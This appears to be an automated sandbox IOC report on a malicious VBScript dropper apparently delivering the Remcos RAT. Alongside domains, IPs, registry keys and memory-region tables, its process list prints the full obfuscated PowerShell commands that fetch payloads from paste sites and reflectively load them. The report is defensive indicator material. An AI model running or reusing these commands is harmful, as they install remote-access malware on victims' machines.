IOC Report
asegurar.vbs

loading gif

Files

File Path
Type
Category
Malicious
asegurar.vbs
Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iejrq5or.0gb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_led4k1bt.bdd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouoftpk4.jyi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz50m0am.a4n.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvv3jrxo.ax3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dll01.txt
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://pastebin.com/raw
unknown
malicious
https://paste.ee/d/Rrk2f/0
188.114.97.3
malicious
https://www.google.com;
unknown
malicious
https://pastebin.com/raw/J6uRjZrv
104.20.3.235
malicious
https://analytics.paste.ee
unknown
malicious
https://www.google.com
unknown
malicious
https://analytics.paste.ee;
unknown
malicious
https://cdnjs.cloudflare.com
unknown
malicious
sost.duckdns.org
malicious
https://cdnjs.cloudflare.com;
unknown
malicious
https://pastebin.com
unknown
malicious
https://secure.gravatar.com
unknown
malicious
https://themes.googleusercontent.com
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://rentry.org/vsm4ofxs/raw
164.132.58.105
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://rentry.org
unknown
https://rentry.org/shqm6g9p/rawP
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
unknown
http://rentry.org
unknown
http://geoplugin.net/json.gp/C
unknown
HTTPS://PASTE.EE/D/RRK2F/0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://rentry.org/vsm4ofxs/rawp
unknown
https://rentry.org/shqm6g9p/raw
164.132.58.105
https://aka.ms/pscore68
unknown
http://www.apache.o
unknown
https://pastebin.com/raw/4B83LcVU
104.20.3.235
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://pastebin.com
unknown
There are 29 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
sost.duckdns.org
181.236.112.169
malicious
pastebin.com
104.20.3.235
malicious
rentry.org
164.132.58.105

IPs

IP
Domain
Country
Malicious
104.20.3.235
pastebin.com
United States
malicious
181.236.112.169
sost.duckdns.org
Colombia
malicious
188.114.97.3
paste.ee
European Union
malicious
127.0.0.1
unknown
unknown
malicious
164.132.58.105
rentry.org
France

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
time
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2C1E000
stack
page read and write
malicious
F38000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
26035520000
trusted library allocation
page read and write
malicious
26035581000
trusted library allocation
page read and write
malicious
22388E20000
trusted library allocation
page read and write
2602723C000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FFD9B936000
trusted library allocation
page execute and read and write
26027240000
trusted library allocation
page read and write
201EA506000
heap
page read and write
2603DA28000
heap
page read and write
7DF45DAF0000
trusted library allocation
page execute and read and write
2D8F000
stack
page read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
26025ADB000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
22389065000
heap
page read and write
2974E3EA000
heap
page read and write
2CB9FE92000
heap
page read and write
26035511000
trusted library allocation
page read and write
2603DCE0000
heap
page read and write
7FFD9B90C000
trusted library allocation
page execute and read and write
26025450000
trusted library allocation
page read and write
BEC2EFF000
unkown
page read and write
318E000
stack
page read and write
2CBA3883000
heap
page read and write
2468DF39000
heap
page read and write
26026B4D000
trusted library allocation
page read and write
201E8260000
heap
page read and write
947D1FE000
stack
page read and write
DB597F9000
stack
page read and write
201EA27C000
heap
page read and write
2238A91A000
trusted library allocation
page read and write
201EA266000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
20180C2D000
trusted library allocation
page read and write
201EA444000
heap
page read and write
223A2CF9000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
D9D89FF000
stack
page read and write
26026EE9000
trusted library allocation
page read and write
2CBA46F9000
heap
page read and write
26026B5A000
trusted library allocation
page read and write
26025BAC000
trusted library allocation
page read and write
2238ACCE000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
260258D4000
trusted library allocation
page read and write
2238A8AB000
trusted library allocation
page read and write
2239A820000
trusted library allocation
page read and write
201E84A0000
trusted library allocation
page read and write
DB5983E000
stack
page read and write
2CB9FE60000
heap
page read and write
D9D8DFE000
stack
page read and write
26023AEE000
heap
page read and write
DB5993B000
stack
page read and write
2238AE6C000
trusted library allocation
page read and write
7D18B0C000
stack
page read and write
2238ABCC000
trusted library allocation
page read and write
BE5000
heap
page read and write
2CB9FEB0000
heap
page read and write
26023C55000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
2974E330000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2CBA2A25000
heap
page read and write
22388E6F000
heap
page read and write
22388D40000
heap
page read and write
201EA334000
heap
page read and write
7D17C78000
stack
page read and write
2CB9FF02000
heap
page read and write
26025AD5000
trusted library allocation
page read and write
223A2FA6000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7D17CFE000
stack
page read and write
26025482000
trusted library allocation
page read and write
6169D7E000
stack
page read and write
7D1797E000
stack
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
2CB9FEDA000
heap
page read and write
201819E4000
trusted library allocation
page read and write
201E8312000
heap
page read and write
328F000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
20180001000
trusted library allocation
page read and write
2602716A000
trusted library allocation
page read and write
2CB9FF2B000
heap
page read and write
1100000
heap
page read and write
201E8341000
heap
page read and write
2CBA00DB000
heap
page read and write
26023B16000
heap
page read and write
201E82E0000
trusted library allocation
page read and write
2974E350000
heap
page read and write
26026B34000
trusted library allocation
page read and write
6169CFE000
stack
page read and write
2CBA4E2A000
heap
page read and write
2CB9FF0B000
heap
page read and write
2018197A000
trusted library allocation
page read and write
201EA830000
heap
page read and write
2CBA5918000
heap
page read and write
22388E79000
heap
page read and write
2CB9FE87000
heap
page read and write
DB596FE000
stack
page read and write
2603DC69000
heap
page read and write
7D17DFE000
stack
page read and write
2603DB60000
heap
page read and write
223A2D55000
heap
page read and write
2603DE90000
heap
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
223A2F30000
heap
page execute and read and write
223A2F54000
heap
page read and write
7D17A7D000
stack
page read and write
260239F0000
heap
page read and write
2238A971000
trusted library allocation
page read and write
7FFD9BBC2000
trusted library allocation
page read and write
260271BB000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9B892000
trusted library allocation
page read and write
7FFD9BA14000
trusted library allocation
page read and write
2238ABF2000
trusted library allocation
page read and write
201EA2C1000
heap
page read and write
26025AC7000
trusted library allocation
page read and write
DB59B3E000
stack
page read and write
7FFD9BA11000
trusted library allocation
page read and write
7FFD9B8AB000
trusted library allocation
page read and write
7D1752D000
stack
page read and write
22388E00000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2603DD0D000
heap
page read and write
26025A8A000
trusted library allocation
page read and write
2CBA1BC2000
heap
page read and write
2603DCD0000
heap
page read and write
22388E3A000
heap
page read and write
2CB9FEE8000
heap
page read and write
260258B7000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page execute and read and write
7D1787E000
stack
page read and write
26023A30000
heap
page read and write
2CBA00D9000
heap
page read and write
22388E8F000
heap
page read and write
2CBA46F4000
heap
page read and write
201E9D70000
heap
page execute and read and write
2CBA00DE000
heap
page read and write
26023BB0000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
22389044000
heap
page read and write
2238AE6A000
trusted library allocation
page read and write
223A2F50000
heap
page read and write
616A33F000
stack
page read and write
26026B6D000
trusted library allocation
page read and write
2603D9B0000
trusted library section
page read and write
22388E77000
heap
page read and write
DB5A74E000
stack
page read and write
26023B63000
heap
page read and write
7D174A3000
stack
page read and write
2603D9EE000
heap
page read and write
201EA13D000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
2468DF30000
heap
page read and write
2238A9D8000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
201E8220000
heap
page read and write
26025B14000
trusted library allocation
page read and write
616A4BB000
stack
page read and write
201E9DE0000
heap
page read and write
D9D839A000
stack
page read and write
26025B01000
trusted library allocation
page read and write
2603D9D0000
heap
page read and write
2018022D000
trusted library allocation
page read and write
2603DC7B000
heap
page read and write
7FFD9B906000
trusted library allocation
page read and write
26025AA6000
trusted library allocation
page read and write
DB598B7000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
20190010000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7D17AF9000
stack
page read and write
7FFD9B853000
trusted library allocation
page execute and read and write
2238A934000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2238A917000
trusted library allocation
page read and write
7D175AE000
stack
page read and write
26025B84000
trusted library allocation
page read and write
26023CA0000
heap
page read and write
20190001000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
201EA48A000
heap
page read and write
223A2D7B000
heap
page read and write
26026C17000
trusted library allocation
page read and write
201E8300000
heap
page read and write
26025B41000
trusted library allocation
page read and write
2CB9FECE000
heap
page read and write
7FFD9B8AC000
trusted library allocation
page execute and read and write
201EA257000
heap
page read and write
304E000
stack
page read and write
7D17BF9000
stack
page read and write
201E84A3000
trusted library allocation
page read and write
201EA272000
heap
page read and write
2238A923000
trusted library allocation
page read and write
201EA24E000
heap
page read and write
2603DD29000
heap
page read and write
22388F28000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
2C8B000
stack
page read and write
201EA360000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
7D1898E000
stack
page read and write
2CBA428D000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
22389040000
heap
page read and write
7FFD9B854000
trusted library allocation
page read and write
BE0000
heap
page read and write
7FFD9B91C000
trusted library allocation
page execute and read and write
223A2D4E000
heap
page read and write
2CB9FF3A000
heap
page read and write
2CB9FF02000
heap
page read and write
2CB9FF02000
heap
page read and write
2603DC8D000
heap
page read and write
7FFD9B940000
trusted library allocation
page read and write
201E834B000
heap
page read and write
947D27E000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
2974E5B0000
heap
page read and write
2CBA3425000
heap
page read and write
26023C50000
heap
page read and write
7FFD9B893000
trusted library allocation
page execute and read and write
260258C4000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page read and write
201E833F000
heap
page read and write
2603D513000
heap
page read and write
22388EBD000
heap
page read and write
2603D9C6000
heap
page execute and read and write
7FFD9BA72000
trusted library allocation
page read and write
26026F17000
trusted library allocation
page read and write
7D188CE000
stack
page read and write
2CBA4E11000
heap
page read and write
26025B49000
trusted library allocation
page read and write
2CBA4E28000
heap
page read and write
2CB9FE20000
heap
page read and write
7D17D7E000
stack
page read and write
2974E320000
heap
page read and write
26023ADA000
heap
page read and write
7FFD9B87C000
trusted library allocation
page read and write
2603DD4F000
heap
page read and write
2CBA25C2000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
201E9D67000
heap
page execute and read and write
D9D8CFD000
stack
page read and write
26026B42000
trusted library allocation
page read and write
26023B14000
heap
page read and write
2CB9FD20000
heap
page read and write
2CBA50F4000
heap
page read and write
947D17F000
stack
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
2468DE50000
heap
page read and write
2CB9FEE7000
heap
page read and write
201819C5000
trusted library allocation
page read and write
2CB9FF0B000
heap
page read and write
2C40000
heap
page read and write
223A2DB7000
heap
page execute and read and write
D9D8FFB000
stack
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
2CBA50F9000
heap
page read and write
DB59ABE000
stack
page read and write
2239A881000
trusted library allocation
page read and write
BEC2B7D000
stack
page read and write
D9D8AFF000
stack
page read and write
2CB9FECA000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
201E8389000
heap
page read and write
6169C73000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
2CB9FF0B000
heap
page read and write
2CB9FF02000
heap
page read and write
2CB9FED8000
heap
page read and write
2CB9FEFC000
heap
page read and write
223A2D50000
heap
page read and write
2603DD3A000
heap
page read and write
2603DC67000
heap
page read and write
2CB9FEDB000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
2603DC5F000
heap
page read and write
223A2DA1000
heap
page read and write
26023A90000
heap
page read and write
26027162000
trusted library allocation
page read and write
260357FC000
trusted library allocation
page read and write
22388EB7000
heap
page read and write
2238A91D000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
201E8120000
heap
page read and write
2603DA5A000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
2CB9FEFC000
heap
page read and write
7FFD9BA32000
trusted library allocation
page read and write
947D0FE000
unkown
page read and write
2603DC5D000
heap
page read and write
2CBA4E2A000
heap
page read and write
26025731000
trusted library allocation
page read and write
201EA4FF000
heap
page read and write
260254F0000
trusted library section
page read and write
26023ACD000
heap
page read and write
7FFD9B916000
trusted library allocation
page read and write
223A2E50000
heap
page read and write
2CB9FEFC000
heap
page read and write
7FFD9B94C000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
616A0BF000
stack
page read and write
616A2BE000
stack
page read and write
2468DF4B000
heap
page read and write
201E833D000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
201EA517000
heap
page read and write
6169DFE000
stack
page read and write
20181B77000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
20181C41000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
22388EB9000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2468E200000
heap
page read and write
260265B4000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
DB5967E000
stack
page read and write
201E831F000
heap
page read and write
22388C60000
heap
page read and write
2CBA25C5000
heap
page read and write
DB5A7CC000
stack
page read and write
BF0000
heap
page read and write
201E835D000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
7FFD9BB90000
trusted library allocation
page read and write
DB599B8000
stack
page read and write
2CBA4F18000
heap
page read and write
2238AC18000
trusted library allocation
page read and write
DB5A60E000
stack
page read and write
7FFD9B87B000
trusted library allocation
page execute and read and write
201EA4DF000
heap
page read and write
DB594FE000
stack
page read and write
7FFD9BB20000
trusted library allocation
page read and write
DB59C3B000
stack
page read and write
DB595FD000
stack
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
26023B90000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
300F000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
2018195D000
trusted library allocation
page read and write
7FFD9B89D000
trusted library allocation
page execute and read and write
7FFD9BAB0000
trusted library allocation
page read and write
2CBA00D5000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
2974E3E0000
heap
page read and write
2468DE30000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
22388F15000
heap
page read and write
201EA460000
heap
page read and write
7D17B77000
stack
page read and write
201901B4000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
223A2E30000
heap
page read and write
2603DC40000
heap
page read and write
201E84E0000
heap
page read and write
223A3180000
heap
page read and write
2238ACF8000
trusted library allocation
page read and write
7D17EFB000
stack
page read and write
EFC000
stack
page read and write
26023A70000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
2238A931000
trusted library allocation
page read and write
B2C000
stack
page read and write
2603580A000
trusted library allocation
page read and write
7FFD9B976000
trusted library allocation
page execute and read and write
20180082000
trusted library allocation
page read and write
2CB9FEDE000
heap
page read and write
26025BB4000
trusted library allocation
page read and write
2602558E000
trusted library allocation
page read and write
2018194D000
trusted library allocation
page read and write
26025480000
trusted library allocation
page read and write
2468DD50000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
20190072000
trusted library allocation
page read and write
7FFD9B946000
trusted library allocation
page execute and read and write
7FFD9BAC0000
trusted library allocation
page read and write
2603DCD8000
heap
page read and write
260271FD000
trusted library allocation
page read and write
7FFD9B864000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
DB5A6CE000
stack
page read and write
2238A87B000
trusted library allocation
page read and write
7FFD9B852000
trusted library allocation
page read and write
D9D8EFF000
stack
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2603DCDC000
heap
page read and write
7D18A8C000
stack
page read and write
2ECF000
stack
page read and write
DB591F3000
stack
page read and write
7FFD9BA1A000
trusted library allocation
page read and write
2603D9C0000
heap
page execute and read and write
201EA25A000
heap
page read and write
22388E10000
heap
page readonly
7FFD9BB30000
trusted library allocation
page read and write
20181474000
trusted library allocation
page read and write
7FFD9BBD7000
trusted library allocation
page read and write
201EA2BF000
heap
page read and write
2238A92E000
trusted library allocation
page read and write
2CB9FE00000
heap
page read and write
7FFD9B946000
trusted library allocation
page read and write
2CBA4283000
heap
page read and write
2468E205000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
201E8460000
heap
page execute and read and write
2603DB40000
heap
page read and write
22388F50000
heap
page read and write
7FFD9BA4A000
trusted library allocation
page read and write
F10000
heap
page read and write
201E8384000
heap
page read and write
D9D86FE000
stack
page read and write
201E834F000
heap
page read and write
2CBA00DA000
heap
page read and write
2603DD53000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
BEC2FFF000
stack
page read and write
2238A865000
trusted library allocation
page read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
7FFD9BA01000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page execute and read and write
7FFD9B863000
trusted library allocation
page execute and read and write
616A43E000
stack
page read and write
26023BA0000
heap
page readonly
7FFD9B85D000
trusted library allocation
page execute and read and write
26027222000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7D1894D000
stack
page read and write
2CBA4E10000
heap
page read and write
26025ACB000
trusted library allocation
page read and write
2603DE40000
heap
page read and write
201E84E5000
heap
page read and write
DB5957E000
stack
page read and write
2238AC24000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
201E8307000
heap
page read and write
2238AE6E000
trusted library allocation
page read and write
2F0D000
stack
page read and write
201E8200000
heap
page read and write
D9D87FE000
stack
page read and write
26023C10000
heap
page execute and read and write
7FFD9BAF0000
trusted library allocation
page read and write
DB5977E000
stack
page read and write
2238A829000
trusted library allocation
page read and write
223A2F56000
heap
page read and write
2B1E000
stack
page read and write
7FFD9B860000
trusted library allocation
